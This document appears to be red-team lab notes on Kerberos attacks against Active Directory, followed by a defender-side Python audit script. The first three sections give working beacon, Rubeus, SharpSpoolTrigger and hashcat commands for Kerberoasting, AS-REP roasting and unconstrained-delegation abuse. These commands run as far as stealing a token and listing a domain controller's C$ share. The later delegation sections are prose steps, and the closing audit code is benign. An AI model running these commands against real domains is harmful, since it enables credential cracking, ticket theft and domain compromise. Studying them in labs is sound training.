
Kerberos

1) Kerberoasting

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

ps> hashcat -a 0 -m 13100 hashes wordlist

2) ASREPRoast

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

ps> hashcat -a 0 -m 18200 svc_oracle wordlist

3) Unconstrained Delegation (caches the TGT of any user accessing its service)

  1. Identify the computer objects that have Unconstrained Delegation enabled

     beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
  2. Dump the cached TGT (requires SYSTEM access on the affected system)

     beacon> getuid
     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap
  3. Execute the PrintSpool attack to force the DC to authenticate to WEB

     beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io
  4. Use the fetched machine TGT (DC) to gain RCE on the DC itself using S4U abuse (/self flag)

     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
  5. Inject the ticket and access the service

     beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
    
     beacon> steal_token 2664
     beacon> ls \\dc-2.dev.cyberbotic.io\c$

4) Constrained Delegation (allows requesting a TGS for any user using its TGT)

  1. Identify the computer objects that have Constrained Delegation enabled

  2. Dump the TGT of the user/computer account that has Constrained Delegation enabled (use asktgt if you only have the NTLM hash)

  3. Use the S4U technique to request a TGS for the delegated service using the machine's TGT (use the S4U2Proxy ticket)

  4. OR, access an alternate service not listed in the delegation attribute (e.g. ldap)

  5. Inject the S4U2Proxy ticket from the previous step

  6. Access the services

5) Resource-Based Constrained Delegation (systems with a writable msDS-AllowedToActOnBehalfOfOtherIdentity attribute)

  1. Identify the computer objects that have the msDS-AllowedToActOnBehalfOfOtherIdentity attribute defined

  2. OR, identify a domain computer where we can write this attribute with a custom value

  3. Assign delegation rights to our computer by modifying the attribute on the target system

  4. Verify the updated attribute

  5. Get the TGT of our computer

  6. Use the S4U technique to get a TGS for the target computer using our TGT

  7. Access the services

  8. Remove the delegation rights

OR, create a fake computer account for the RBCD attack

  1. Check whether we have permission to create a computer account (allowed by default)

  2. Create a fake computer account with a random password (generate the hash using Rubeus)

  3. Use the hash to get a TGT for our fake computer; the rest of the steps remain the same
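An added audit example (not from these notes or any of the tools above) that applies the checks behind the five sections to a constructed LDAP export, from the defender side: the bitwise-AND test that the 1.2.840.113556.1.4.803 filters perform on userAccountControl, SPNs on user accounts, msDS-AllowedToDelegateTo and msDS-AllowedToActOnBehalfOfOtherIdentity. The AdObject record, account names and hostnames are assumptions for the example.

```python
from dataclasses import dataclass, field
# userAccountControl bits behind the LDAP filters above; the matching rule
# 1.2.840.113556.1.4.803 used there is a bitwise AND on this attribute.
UF_TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
UF_DONT_REQUIRE_PREAUTH = 0x400000             # 4194304: AS-REP roastable
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self allowed)

@dataclass
class AdObject:                                      # hypothetical record shape
    sam: str
    category: str                                    # "user" or "computer"
    uac: int                                         # userAccountControl
    spns: list = field(default_factory=list)         # servicePrincipalName
    delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo
    rbcd_from: list = field(default_factory=list)    # msDS-AllowedToActOnBehalfOfOtherIdentity (resolved names)

def uac_matches(obj, bit):
    # Same test as the filter (userAccountControl:1.2.840.113556.1.4.803:=<bit>)
    return obj.uac & bit == bit

def kerberos_findings(obj):
    """Review items for one object; an empty list means nothing to look at."""
    f = []
    if obj.category == "user" and obj.spns and obj.sam.lower() != "krbtgt":
        f.append("kerberoastable: user account with SPN " + ", ".join(obj.spns))
    if obj.category == "user" and uac_matches(obj, UF_DONT_REQUIRE_PREAUTH):
        f.append("asrep-roastable: Kerberos pre-authentication not required")
    if uac_matches(obj, UF_TRUSTED_FOR_DELEGATION):
        f.append("unconstrained delegation: caches the TGT of every connecting user")
    if obj.delegate_to:
        kind = ("with protocol transition" if uac_matches(obj, UF_TRUSTED_TO_AUTH_FOR_DELEGATION)
                else "Kerberos-only")
        f.append(f"constrained delegation ({kind}) to " + ", ".join(obj.delegate_to))
    if obj.rbcd_from:
        f.append("RBCD: " + ", ".join(obj.rbcd_from) + " may delegate to this host")
    return f

def audit(objects):
    # sAMAccountName -> findings, only for objects that have at least one
    return {o.sam: fs for o in objects if (fs := kerberos_findings(o))}

# Constructed sample export (hypothetical accounts and hostnames, not real data).
SAMPLE = [
    AdObject("mssql_svc", "user", 0x10200, spns=["MSSQLSvc/sql01.example.local:1433"]),
    AdObject("squid_svc", "user", 0x400200),
    AdObject("jdoe", "user", 0x200),
    AdObject("WEB$", "computer", 0x81000),
    AdObject("SQL01$", "computer", 0x1001000, delegate_to=["cifs/file01.example.local"]),
    AdObject("FILE01$", "computer", 0x1000, rbcd_from=["WEB$"]),
]
```

Running `audit(SAMPLE)` lists every account a reviewer should look at and why; a clean account such as `jdoe` does not appear.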
